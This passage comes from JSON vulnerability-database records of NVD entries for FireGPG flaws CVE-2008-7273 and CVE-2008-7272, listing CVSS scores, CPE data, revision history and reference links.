20200121 [SECURITY] [DLA 2073-1] transfig security update", "refsource": "MLIST", "tags": [], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html"}, {"name": "https://sourceforge.net/p/mcj/tickets/55/", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://sourceforge.net/p/mcj/tickets/55/"}], "immutableFields": []}, {"id": "CVE-2008-7273", "bulletinFamily": "NVD", "title": "CVE-2008-7273", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "published": "2019-11-18T22:15:00", "modified": "2019-11-20T15:56:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "cvelist": ["CVE-2008-7273"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedSoftware": [{"name": "getfiregpg iceweasel-firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:iceweasel-firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-12-18T13:57:06", "references": [], "rev": 2}, "score": {"modified": "2019-12-18T13:57:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "d61e8c253c1f5d35ed5977532afcfe58d323a03057be4323e8c19bd7bed39d26", "hashmap": [{"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "3e1e24cf5fed13b85f5534cb239a1044", "key": "cpe"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4464888dd8ea79b7344278e86594f061", "key": "affectedSoftware"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2019-12-18T13:57:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2019-12-18T13:57:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "557fd4cb813bf4897b5fdca93f953d2fe22dd9fed46f9a924ed2d03719983a4f", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-09-21T13:59:22", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "enchantments": {"dependencies": {"modified": "2020-12-09T19:28:28", "references": [], "rev": 2}, "score": {"modified": "2020-12-09T19:28:28", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [], "hash": "3f2537e658f4240fe6f7df8e451ce685d2ca8ba79fbda529c1842e690c507e37", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-12-09T19:28:28", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 76}, "differentElements": ["extraReferences"], "edition": 7, "lastseen": "2020-12-09T19:28:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T11:51:06", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T11:51:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "3f49259ae0555553bcbf3433a53f5984d6de287f6d865e78b449bda3b88b8ea7", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-10-03T11:51:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 72}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-10-03T11:51:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "hash": "5b731cb69531a1a4f440c98e6086aef32b59d25a21b3e795f6d21cdd0acb5966", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "85fdbb6779c8f53457b03e4617cac1fd", "key": "extraReferences"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2019-11-20T15:56:00", "objectVersion": "1.5", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 78}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "2323c5f10ea99bff6a3fd88adbf7723c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "b37293c28011cded7e6cea212cc908fa"}, {"key": "cvelist", "hash": "9c6958cd5dd022a438c0a93346bb7717"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a6adb76bd2d2e833d4aee455da4b36c3"}, {"key": "cvss3", "hash": "beb519effad5780952ea4ce1697a49ad"}, {"key": "cwe", "hash": "c92f044c94e4360fec268c45081f3bc6"}, {"key": "description", "hash": "f427291f843f1948956af8f0777cb86f"}, {"key": "extraReferences", "hash": "85fdbb6779c8f53457b03e4617cac1fd"}, {"key": "href", "hash": "b066b40875680d07f9f9912048360029"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "368a4092894f1320c5eb8d6f1746c872"}, {"key": "published", "hash": "d1c394bb6e6939e65900ac8652bcb35f"}, {"key": "references", "hash": "d613e2c86955266b0d3e0b9be74eae16"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5a3d95049ed4485340188fd46566963d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d695debc34a1657f10acd9dd2989cff4ec01e7bd03c81d546ca7db279f9ade48", "viewCount": 85, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-59"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "immutableFields": []}, {"id": "CVE-2008-7272", "bulletinFamily": "NVD", "title": "CVE-2008-7272", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "published": "2019-11-08T00:15:00", "modified": "2020-02-10T21:16:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "cvelist": ["CVE-2008-7272"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "f6701a04d3477e440e72324b648d7646a2f9466e07e83e341707bb314aec84a0", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": 